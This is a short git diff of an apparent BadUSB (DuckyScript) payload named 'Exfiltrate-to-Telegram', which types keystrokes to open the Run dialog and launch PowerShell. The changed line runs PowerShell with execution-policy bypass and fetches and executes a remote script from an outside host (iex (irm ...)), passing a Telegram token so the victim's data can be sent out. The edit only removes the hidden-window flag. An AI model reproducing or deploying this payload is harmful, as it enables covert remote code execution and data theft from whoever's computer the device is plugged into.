diff --git a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt index cad6217..b361525 100644 --- a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt +++ b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt @@ -14,6 +14,6 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; iex (irm bw0.cc/extg) +STRING powershell -Ep Bypass -C $tg='TELEGRAM_TOKEN'; iex (irm bw0.cc/extg) ENTER